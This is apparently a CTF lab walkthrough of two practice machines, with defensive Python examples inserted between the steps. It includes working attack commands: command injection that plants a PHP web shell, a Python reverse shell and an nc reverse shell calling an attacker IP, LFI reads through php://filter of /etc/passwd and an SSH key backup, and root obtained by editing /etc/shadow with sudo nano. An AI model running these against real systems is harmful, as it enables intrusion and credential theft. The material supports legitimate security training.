ptd-Merry-Go-Round

E:\PENTEST\NMAP>

nmap -p- 10.150.150.100

Starting Nmap 7.70 ( https://nmap.org ) at 2021-02-19 15:38 W. Europe Standard Time
Stats: 0:00:28 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 72.50% done; ETC: 15:38 (0:00:05 remaining)
Nmap scan report for 10.150.150.100
Host is up (0.030s latency).
Not shown: 65522 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
5000/tcp open upnp
8131/tcp open indigo-vbcp
8148/tcp open isdd
8154/tcp open unknown
8169/tcp open unknown
8214/tcp open unknown
8422/tcp open unknown
8600/tcp open asterix
8795/tcp open unknown
8971/tcp open unknown
8984/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 34.23 seconds

E:\PENTEST\NMAP>

curl http://10.150.150.100:8131

>> eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiaXRzbWUiLCJwYXNzIjoiMmMxN2M2MzkzNzcxZWUzMDQ4YWUzNGQ2YjM4MGM1ZWMifQ.7mndOl98wTtLrPLZN_69UwY4e2sY_lmy_3tSiF3bTkU
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>curl http://10.150.150.100:8148
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>curl http://10.150.150.100:8148
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>curl http://10.150.150.100:8148
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>curl http://10.150.150.100:8148
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>curl http://10.150.150.100:8148
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>

curl http://10.150.150.100:8148/

>> eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoicmljaGFyZCIsInBhc3MiOiI3NzY4NjE3NDZFNkY3NCJ9.e_FDTScd6anuQyWH7sCetjCqjTjvsi_9Sk5d1-vcU_4
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>

curl http://10.150.150.100:8154/

>> eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoibG9va2hlcmUiLCJwYXNzIjoiZjUyY2FlN2Q2NzdmZDhhODNhYzdjYzQ0MDZjMWQwNzNhNjlhN2IyMyJ9.V1ERq4lFaEr_U9vdE1n43uq-cP5zS8EKaRJKfvhaOjY
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>curl http://10.150.150.100:8169
>> eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiYWRtaW5pc3RyYXRvciIsInBhc3MiOiJqdXBpdGVyIn0.4dA5aV12WciBnX_53pR_Zs0q1FdCwqMBjaRvWMKJlB8
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>curl http://10.150.150.100:8214/
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>

curl http://10.150.150.100:8214/

>> eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiaG9uZXkiLCJwYXNzIjoiMzdjNjA3MTE5OWZjMGQ1NGM3ODA0ZjRlZTY3ZTBiZTFmZjQ5MGUwOWE3MzE2ZWIyMDJmODE4ZDcwOTk1MjU3MGYzMGVmYjE1ZjMwMGQ1ZTYwNmMxZjAxMjdlMTNiMTkwODU0Y2UyMjFkNjllYjg3OTBhZjI4YTQ0NjNmYTZiODEifQ.B7oIwzKMDvqASNqGMeCF65oD8JARDh1rGrR26j6QQE4
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>

curl http://10.150.150.100:8422/

>> eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoibG9va2hlcmUiLCJwYXNzIjoiYTk0YThmZTVjY2IxOWJhNjFjNGMwODczZDM5MWU5ODc5ODJmYmJkMyJ9.5fM1qeavBWXL2_DzbpJD9pPAHsuoKaH6h4WLGEKPCtg
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>curl http://10.150.150.100:8600/
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>curl http://10.150.150.100:8600/
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>

curl http://10.150.150.100:8600/

>> eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiYWRtaW5pc3RyYXRvciIsInBhc3MiOiJiYW5hbmEifQ.7jqCMA8wLvqFf_B_K7xLpJ6HFHUFBtYZjZgKbL__Euk

E:\PENTEST\NMAP>curl http://10.150.150.100:8795/
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>curl http://10.150.150.100:8795/
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>

curl http://10.150.150.100:8795/

>> eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiam9obiIsInBhc3MiOiJVRTlxZG5JNFVrcDNlSGQxYWt0VFpRbz0ifQ.KnkALx296Nb4Y-2JzTvbK2IedamG7gp_TpKb36WFqhI
curl: (56) Recv failure: Connection was reset

E:\PENTEST\NMAP>

.

{"typ":"JWT","alg":"HS256"}.{"user":"richard","pass":"776861746E6F74"}
{"typ":"JWT","alg":"HS256"}.{"user":"administrator","pass":"jupiter"}
{"typ":"JWT","alg":"HS256"}.{"user":"honey","pass":"37c6071199fc0d54c7804f4ee67e0be1ff490e09a7316eb202f818d709952570f30efb15f300d5e606c1f0127e13b190854ce221d69eb8790af28a4463fa6b81"}
{"typ":"JWT","alg":"HS256"}.{"user":"administrator","pass":"banana"}
{"typ":"JWT","alg":"HS256"}.{"user":"john","pass":"UE9qdnI4Ukp3eHd1aktTZQo="}
=> decode once more => POjvr8RJwxwujKSe
=> login

john / POjvr8RJwxwujKSe

gives FLAG73=26ABDA36DFAE4CBA32ADB2DD5B53EFCFC60875C4
http://10.150.150.100:5000/landing
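Decoding the tokens segment by segment, as an added example that is not part of the original writeup: feeding a whole token to base64 -d is what produced the garbled tails in the decoded lines above, because the "." separators are not base64 and the third segment is a raw 32-byte HMAC rather than text. The script below splits on ".", decodes header and payload as JSON, keeps the signature as bytes, checks whether a "pass" field is itself base64 (as with john's token), and shows how a server verifies or mints an HS256 token. The two tokens are copied from this page; the signing key used in the demonstration is a constructed placeholder, not the lab's key.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Constructed input: two of the tokens the ports on 10.150.150.100 returned (copied from the writeup).
TOKENS = [
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoicmljaGFyZCIsInBhc3MiOiI3NzY4NjE3NDZFNkY3NCJ9.e_FDTScd6anuQyWH7sCetjCqjTjvsi_9Sk5d1-vcU_4",
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiam9obiIsInBhc3MiOiJVRTlxZG5JNFVrcDNlSGQxYWt0VFpRbz0ifQ.KnkALx296Nb4Y-2JzTvbK2IedamG7gp_TpKb36WFqhI",
]


def b64url_decode(segment: str) -> bytes:
    """JWT segments are base64url without '=' padding; restore it before decoding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def decode_jwt(token: str) -> dict:
    """Split on '.', decode header and payload as JSON and keep the signature as raw bytes.
    This is why 'base64 -d' on the whole token garbles: the dots are not base64 and
    the signature is 32 binary bytes, not text."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    return {
        "header": json.loads(b64url_decode(header_b64)),
        "payload": json.loads(b64url_decode(payload_b64)),
        "signature": b64url_decode(sig_b64),
        "signing_input": f"{header_b64}.{payload_b64}".encode("ascii"),
    }


def verify_hs256(token: str, key: bytes) -> bool:
    """Recompute HMAC-SHA256 over header.payload with the server key and compare in constant time.
    Decoding a token needs no key; only verification does."""
    parts = decode_jwt(token)
    if parts["header"].get("alg") != "HS256":  # never let the token choose the algorithm
        return False
    expected = hmac.new(key, parts["signing_input"], hashlib.sha256).digest()
    return hmac.compare_digest(expected, parts["signature"])


def sign_hs256(payload: dict, key: bytes) -> str:
    """Mint a token the way a server would; used here only to show verify_hs256 succeeding."""
    header = b64url_encode(json.dumps({"typ": "JWT", "alg": "HS256"}, separators=(",", ":")).encode())
    body = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    signing_input = f"{header}.{body}".encode("ascii")
    tag = hmac.new(key, signing_input, hashlib.sha256).digest()
    return f"{header}.{body}.{b64url_encode(tag)}"


def maybe_base64(value: str) -> Optional[str]:
    """Return the decoded text if value is canonical base64 (john's 'pass' field), else None."""
    try:
        raw = base64.b64decode(value, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    if base64.b64encode(raw).decode("ascii") != value:
        return None
    return raw.decode("utf-8", errors="replace").strip()


if __name__ == "__main__":
    for token in TOKENS:
        parts = decode_jwt(token)
        print(parts["header"], parts["payload"], f"sig={len(parts['signature'])} bytes")
        inner = maybe_base64(str(parts["payload"].get("pass", "")))
        if inner:
            print("  pass is base64 ->", inner)
```

The defender's point is the last two functions: a token carries its claims in the clear, so putting a password in the payload publishes it to anyone who receives the token, and only the keyed verification step gives the server any assurance about who created it.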

view-source:http://10.150.150.100:5000/static/door-lib-version1.2.min.js


puckiestyle, [22.02.21 13:37]
hi Jonne, I looked at the JavaScript [ http://10.150.150.100:5000/static/door-lib-version1.2.min.js ] with a beautifier, did find sha256("username:user") & sha256("username:admin") in console.log, but no idea how to apply this,

Jonne, [22.02.21 13:39]
You can make a cookie with sha256("john:admin")

Jonne, [22.02.21 13:39]
curl -i --cookie "role=b7ea426b84a5a44ddeabcd2cdc0f6e42a4fd65be4756beeb5ebeb5cc73c23c06" 'http://10.150.150.100:5000/landing'

Jonne, [22.02.21 13:41]
<h1> Welcome Admin! </h1>
<!-- Open sesame! -->

.

curl -i --cookie "role=b7ea426b84a5a44ddeabcd2cdc0f6e42a4fd65be4756beeb5ebeb5cc73c23c06" 'http://10.150.150.100:5000/landing'

┌─[user@parrot-virtual]─[~/ptd]
└──╼ $curl -i --cookie "role=b7ea426b84a5a44ddeabcd2cdc0f6e42a4fd65be4756beeb5ebeb5cc73c23c06" 'http://10.150.150.100:5000/landing'
HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 574
Server: Werkzeug/1.0.1 Python/3.6.9
Date: Mon, 22 Feb 2021 13:50:00 GMT

<!DOCTYPE html>
<html>
<head>
<title>Index</title>
</head>
<body>

<p>FLAG74=BCE09F9895DED436359E935D0F77B1CDAE3CBC02</p></br>
<h1> Welcome Admin! </h1>

<!-- Open sesame! -->

<form action="/landing" method="post">
<div class="container">
<label for="target"><b>IP</b></label>
<input type="text" placeholder="Enter IP Address" name="target" autocomplete="off" required>
<button type="submit">Check</button>
</br>
<h3> Connectivity Result: </h3></br>

</div>

<div class="container" style="background-color:#f1f1f1">

</div>
</form> 
</body>
</html>
┌─[user@parrot-virtual]─[~/ptd]
└──╼ $
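The role cookie in the exchange above is sha256("<user>:<role>") with no server secret, so anyone who reads the JavaScript can mint the admin value. The following is an added example, not code from the page or the lab: it contrasts that scheme with an HMAC-tagged cookie in which the role travels in the clear, the tag is keyed with a server-side secret, and comparison is constant-time. SERVER_SECRET is generated at import time purely for the demonstration; a real server loads it from configuration.

```python
import hashlib
import hmac
import secrets
from typing import Optional, Tuple


# Weak scheme, as the lab's JavaScript suggests: sha256("<user>:<role>") with no secret.
def weak_role_cookie(user: str, role: str) -> str:
    return hashlib.sha256(f"{user}:{role}".encode()).hexdigest()


def weak_is_admin(user: str, cookie: str) -> bool:
    # The server recomputes the same public function, so a client can too.
    return cookie == weak_role_cookie(user, "admin")


# Hardened scheme (added here): HMAC over "user:role" with a server-side secret.
# Constructed for the demo; never ships to clients.
SERVER_SECRET = secrets.token_bytes(32)


def _tag(user: str, role: str, key: bytes) -> str:
    return hmac.new(key, f"{user}:{role}".encode(), hashlib.sha256).hexdigest()


def signed_role_cookie(user: str, role: str, key: bytes = SERVER_SECRET) -> str:
    """Issue 'user:role:tag'. The delimiter is rejected inside the fields so the signed
    string parses back to exactly one (user, role) pair."""
    if ":" in user or ":" in role:
        raise ValueError("':' is the field delimiter and may not appear in user or role")
    return f"{user}:{role}:{_tag(user, role, key)}"


def parse_signed_cookie(cookie: str, key: bytes = SERVER_SECRET) -> Optional[Tuple[str, str]]:
    """Return (user, role) only if the tag was produced with our key; None otherwise."""
    try:
        user, role, tag = cookie.split(":")
    except ValueError:  # wrong number of fields
        return None
    if not hmac.compare_digest(_tag(user, role, key).encode(), tag.encode()):
        return None
    return user, role


def role_from_request(cookie: str, key: bytes = SERVER_SECRET) -> str:
    """What a /landing handler should do: fall back to the least privilege on any failure."""
    parsed = parse_signed_cookie(cookie, key)
    return parsed[1] if parsed else "anonymous"


if __name__ == "__main__":
    print("weak cookie anyone can compute:", weak_role_cookie("john", "admin"))
    issued = signed_role_cookie("john", "user")
    print("signed cookie:", issued, "->", role_from_request(issued))
    print("edited to admin ->", role_from_request(issued.replace(":user:", ":admin:")))
```

A session store that keeps the role server-side and hands out only an opaque random identifier is the stronger option still; the HMAC variant is the minimum that stops the forgery shown in the chat.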

rm -f /tmp/p; mknod /tmp/p p && nc 10.66.66.42 4444 0/tmp/p

curl -i --cookie "role=b7ea426b84a5a44ddeabcd2cdc0f6e42a4fd65be4756beeb5ebeb5cc73c23c06" 'http://10.150.150.100:5000/landing' -d 'target=10.66.66.18; echo "PD9waHAKICAgIGlmKGlzc2V0KCRfR0VUWydjbWQnXSkpCiAgICB7CiAgICAgICAgc3lzdGVtKCRfR0VUWydjbWQnXSk7CiAgICB9CgoK" | base64 -d > /var/www/html/shell.php'

http://10.150.150.100/shell.php?cmd=whoami

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.66.66.42",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
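The IP check form in the response above hands the submitted target to a shell, which is what lets a "; ..." suffix run as a second command. This is an added example, not the lab's code, showing the vulnerable string-building pattern beside a hardened version: a tokeniser that counts how many commands a shell would see in the string, an ipaddress-based validator that accepts only a literal address, and an argv-list call with no shell. The "ping -c 1" prefix is an assumption about what the lab's connectivity check ran.

```python
import ipaddress
import shlex
import subprocess
from typing import List

SHELL_OPERATORS = {";", "|", "||", "&", "&&"}


def build_check_command_vulnerable(target: str) -> str:
    """The pattern behind the form: the submitted target is spliced into a shell string.
    Run with shell=True, everything after ';' becomes a second command.
    Shown only to be analysed; this string is never executed here."""
    return f"ping -c 1 {target}"


def shell_words(cmd: str) -> List[str]:
    """Tokenise like a POSIX shell, returning ; | & as their own tokens."""
    lexer = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


def count_commands(cmd: str) -> int:
    """Number of simple commands a shell would run for this string (1 = nothing injected)."""
    return 1 + sum(1 for tok in shell_words(cmd) if tok in SHELL_OPERATORS)


def validate_target(target: str) -> str:
    """Hardened input check: only a literal IPv4/IPv6 address passes; ';', '|', spaces,
    hostnames and option-looking values are all rejected before any command is built."""
    try:
        return str(ipaddress.ip_address(target.strip()))
    except ValueError as exc:
        raise ValueError(f"rejected target {target!r}") from exc


def run_check(target: str, base_cmd=("ping", "-c", "1")) -> subprocess.CompletedProcess:
    """Hardened execution: argv list and no shell, so the target is always exactly one argument."""
    safe = validate_target(target)
    return subprocess.run([*base_cmd, safe], capture_output=True, text=True, timeout=10)


if __name__ == "__main__":
    for submitted in ("10.66.66.18", "10.66.66.18; echo injected"):
        cmd = build_check_command_vulnerable(submitted)
        print(f"{cmd!r}: shell would run {count_commands(cmd)} command(s)")
        try:
            print("  hardened path accepts:", validate_target(submitted))
        except ValueError as err:
            print("  hardened path:", err)
```

Validation alone is not the fix: the argv list is what removes the shell from the picture, and the validator is there so an address like "-c" cannot be read as an option by ping itself.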

┌─[user@parrot-virtual]─[~/ptd/merry-go-round]
└──╼ $

sudo nc -nlvp 80

[sudo] password for user: 
listening on [any] 80 ...
connect to [10.66.66.42] from (UNKNOWN) [10.150.150.100] 46010
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(happy) gid=1000(happy) groups=1000(happy),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
$

whoami

happy
$

sudo /bin/sh

cat flag75.txt
FLAG75=384FA60682220A6AAA314E6A03059215D34A2225
cat flag76.txt
FLAG76=342E17655889D42D4B90E3985BFFB53E6D2EE36F

.

Author : Puckiestyle

ptd-silence-private

.

.

┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $cat allports.nmap 
# Nmap 7.91 scan initiated Wed Feb 17 08:03:40 2021 as: nmap -A -oN allports.nmap 10.150.150.55
Nmap scan report for 10.150.150.55
Host is up (0.032s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 13 Jun 12 2020 test
| ftp-syst: 
| STAT: 
| FTP server status:
| Connected to ::ffff:10.66.66.42
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
1055/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: 53m37s
|_nbstat: NetBIOS name: UBUNTU, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled but not required
| smb2-time: 
| date: 2021-02-17T08:57:32
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Feb 17 08:03:55 2021 -- 1 IP address (1 host up) scanned in 14.70 seconds
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]

.

 

┌─[✗]─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $dirb http://10.150.150.55 /usr/share/wordlists/10k-most-common.txt -X .php

-----------------
DIRB v2.22 
By The Dark Raver
-----------------

START_TIME: Thu Feb 18 08:27:26 2021
URL_BASE: http://10.150.150.55/
WORDLIST_FILES: /usr/share/wordlists/10k-most-common.txt
EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]

-----------------

GENERATED WORDS: 10000

---- Scanning URL: http://10.150.150.55/ ----
+ http://10.150.150.55/trick.php (CODE:200|SIZE:0) 
+ http://10.150.150.55/info.php (CODE:200|SIZE:70050) 
+ http://10.150.150.55/??????.php (CODE:200|SIZE:10918) 
+ http://10.150.150.55/?????.php (CODE:200|SIZE:10918) 

-----------------
END_TIME: Thu Feb 18 08:32:58 2021
DOWNLOADED: 10000 - FOUND: 4
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $cat trick.php 
<?php

include($_GET['page']);

?>

┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $curl -X POST --data "file=browser.php" 10.150.150.55/info.php

┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $smbclient -L 10.150.150.55 -U "" -N

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (ubuntu server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

trick.php?page=index.html

curl 'http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=index.php' | base64 -d > index.php

And in that source you then find:
index.php?path=/

=> http://10.150.150.55/index.php?path=/

http://10.150.150.55/index.php?path=/home/sally/backup/SSHArchiveBackup.tar.gz

curl 'http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/home/sally/backup/SSHArchiveBackup.tar.gz' | base64 -d > home/sally/backup/SSHArchiveBackup.tar.gz

┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $ls -la
total 256
drwxr-xr-x 1 user user 138 Feb 17 10:55 .
drwxr-xr-x 1 user user 2034 Feb 17 08:02 ..
-rw-r--r-- 1 user user 1617 Feb 17 08:03 allports.nmap
-rw-r--r-- 1 user user 56184 Feb 17 10:45 browser.php
-rw-r--r-- 1 user user 6 Feb 17 08:05 hallo.txt
-rw-r--r-- 1 user user 4694 Feb 17 10:24 index.php
-rw-r--r-- 1 user user 183770 Feb 17 10:55 SSHArchiveBackup.tar.gz
-rw-r--r-- 1 user user 13 Feb 17 08:06 test
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $curl 'http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/home/sally/backup/SSHArchiveBackup.tar.gz' | base64 -d > SSHArchiveBackup.tar.gz
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $curl 'http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/etc/passwd' | base64 -d > passwd
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 100 4128 100 4128 0 0 58971 0 --:--:-- --:--:-- --:--:-- 58971
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $cat passwd 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
--snip--
sshd:x:126:65534::/run/sshd:/usr/sbin/nologin
gary:x:1001:1001::/home/gary:/bin/sh
john:x:1002:1002::/home/john:/bin/sh
sally:x:1003:1003::/home/sally:/bin/sh
alice:x:1004:1004::/home/alice:/bin/sh
ftp:x:127:133:ftp daemon,,,:/srv/ftp/home/:/usr/sbin/nologin
ftpuser:x:1005:1005::/home/ftpuser:/bin/sh
Debian-snmp:x:128:136::/var/lib/snmp:/bin/false
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $curl 'http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/home/alice/myFile.txt' | base64 -d > myFile.txt
for key in id_rsa*; do echo $key; ssh -p 1055 -o "PreferredAuthentications=publickey" alice@10.150.150.55 -i $key; done

And then the same for the other users (gary, sally and alice)
for key in id_rsa*; do echo $key; ssh -p 1055 -o "PreferredAuthentications=publickey" john@10.150.150.55 -i $key; done

curl 'http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/home/john/FLAG79.txt' | base64 -d > FLAG79.txt
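Seen from the server, the requests above (include($_GET['page']) fed with php://filter/convert.base64-encode/resource=...) leave a distinctive trail in the Apache access log. The detector below is an added example and not part of the writeup: it parses combined-format log lines, URL-decodes every query value, and flags PHP stream wrappers, ".." traversal and reads of sensitive absolute paths. The sample lines are constructed from the requests in this section with made-up timestamps, sizes and a second client address. It treats index.php?path= as just another parameter, so the file browser's own use of that endpoint also trips the sensitive-path rule; SENSITIVE_PREFIXES is an assumption to tune per application.

```python
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-format lines modelled on the requests in this section;
# timestamps, sizes and the second client IP are made up.
SAMPLE_LOG = """\
10.66.66.42 - - [17/Feb/2021:10:24:01 +0000] "GET /trick.php?page=index.html HTTP/1.1" 200 10918 "-" "curl/7.74.0"
10.66.66.42 - - [17/Feb/2021:10:24:09 +0000] "GET /trick.php?page=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 6260 "-" "curl/7.74.0"
10.66.66.42 - - [17/Feb/2021:10:55:30 +0000] "GET /trick.php?page=php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3D%2Fetc%2Fpasswd HTTP/1.1" 200 5504 "-" "curl/7.74.0"
10.66.66.42 - - [17/Feb/2021:10:57:12 +0000] "GET /index.php?path=/home/sally/backup/SSHArchiveBackup.tar.gz HTTP/1.1" 200 183770 "-" "Mozilla/5.0"
10.66.66.42 - - [17/Feb/2021:10:58:00 +0000] "GET /trick.php?page=../../../../etc/shadow HTTP/1.1" 200 0 "-" "curl/7.74.0"
10.1.2.3 - - [17/Feb/2021:11:00:00 +0000] "GET /index.php?path=/var/www/html/docs HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
WRAPPER_RE = re.compile(r"^(php|file|data|phar|expect|zip)://", re.IGNORECASE)
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
SENSITIVE_PREFIXES = ("/etc/", "/home/", "/root/", "/proc/")  # assumption: tune per app


def classify_value(value: str) -> List[str]:
    """Tags for one query-string value. parse_qs already decoded once; decode again so
    %25-style double encoding does not slip past the patterns."""
    decoded = unquote(value)
    tags = []
    if WRAPPER_RE.match(decoded):
        tags.append("stream-wrapper")
    if TRAVERSAL_RE.search(decoded):
        tags.append("traversal")
    if any(prefix in decoded for prefix in SENSITIVE_PREFIXES):
        tags.append("sensitive-path")
    return tags


def scan_line(line: str) -> Optional[Dict]:
    """Return an alert dict for a suspicious request line, None for clean or unparsable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("url"))
    findings: List[Tuple[str, str]] = []
    for key, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            findings.extend((key, tag) for tag in classify_value(value))
    if not findings:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"), "path": parts.path,
            "status": int(m.group("status")), "findings": findings}


def scan_log(text: str) -> List[Dict]:
    return [alert for alert in map(scan_line, text.splitlines()) if alert]


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["ip"], alert["path"], alert["status"], alert["findings"])
```

A 200 with a non-zero size on a stream-wrapper hit is the line worth paging on: it means the include succeeded and the file contents left the box, which is exactly what happened with index.php and /etc/passwd here.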

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC9I2y+p4cBMuaydINICFfYW7EFhDJA0DaLxokCz5UutruL+oNA2oJmeAqdK1CaHyfQd56TSnzCruadO3mOCjzCLBuxDxYTJxsOpOaaJP/fUfFrUG2A1rqQzxXYy6ylQEJzyN+bdO5U3C7HpY7W5LMRZls8bw8YhO+PMZVS7Nv6z/+iDbqk56RyG2yDcb8aJDX3WTv0jTMbNRCUfn2dZzoXymGbZcKpUd2ep4u+G4wHOceDHxAAB2bPZYIJcEsTsmDjtKueJCb9deOOWtZ/Y9ZLmnA807KiHhbAquiWTazNNFiFrKQv0/aJpW9q19ZYRE1GUz6WNLcYFJsbBzLWmjTXMoHIBtNVnd0KuRYKubRNcENNIg2IebCdV5NcYuzE8+AUGyIR8EAmZ4s8XCWMk/yj1kPep+PcyHMj+QaP6kn3i1ub2As39K6WB6txDo4CzIv3EFWprtRX3o43/ItSLVmhTK2QVfgEcefAyCV52b8LKvjPJ0QZB1Ka2L5ogagc9XU= root@parrot-virtual" > authorized_keys
┌─[✗]─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $sudo ssh -i id_rsa john@10.150.150.55 -p 1055
Silence Please
Last login: Sat Jul 4 02:27:27 2020 from 10.210.210.55
$ id
uid=1002(john) gid=1002(john) groups=1002(john),1006(netAdmin)
$ cat FLAG79.txt
3ca569f9d5bc771b0457c4f4d42d29c4824e8d70
$ sudo -l
Matching Defaults entries for john on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
logfile=/var/log/sudo.log

User john may run the following commands on ubuntu:
(ALL) NOPASSWD: /usr/bin/nano

$ pwd
/home/john/.ssh
$ openssl passwd -6 -salt xyz yourpass
$6$xyz$VKswtvLoVpOLcpjDMIFXhxa8ukqqKSKHjcPBLZUk9NxWldmlFQY4stUGo.QjEhav7mp86ih2PRqYPqjkhWi5y.
$
$ nano /etc/shadow
$ id
uid=1002(john) gid=1002(john) groups=1002(john),1006(netAdmin)
$ sudo nano /etc/shadow
$ su root
Password: 
root@ubuntu:/home/john# cd /root
root@ubuntu:~# ls
FLAG80.txt hiddenFile snap
root@ubuntu:~# cat FLAG80.txt
75a60cd346351234ecb8348d7c1da94dac75fc4c
root@ubuntu:~#

root@ubuntu:~# cat /etc/shadow | grep root
root:$6$xyz$VKswtvLoVpOLcpjDMIFXhxa8ukqqKSKHjcPBLZUk9NxWldmlFQY4stUGo.QjEhav7mp86ih2PRqYPqjkhWi5y.:18501:0:99999:7:::
root@ubuntu:~#
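What made the last step possible is the sudo -l result: (ALL) NOPASSWD: /usr/bin/nano, an unrestricted editor run as root, which is all it takes to rewrite /etc/shadow. The audit script below is an added example, not from the writeup: it parses sudo -l output into rules and grades them. The input is this page's output plus one constructed extra rule for contrast, one rule per line is assumed, and the editor list is a minimal assumption meant to be extended.

```python
import os
import re
from typing import Dict, List

# Constructed input: the 'sudo -l' output from the writeup, plus one extra rule for contrast.
SUDO_L_OUTPUT = r"""
Matching Defaults entries for john on ubuntu:
    env_reset, mail_badpass,
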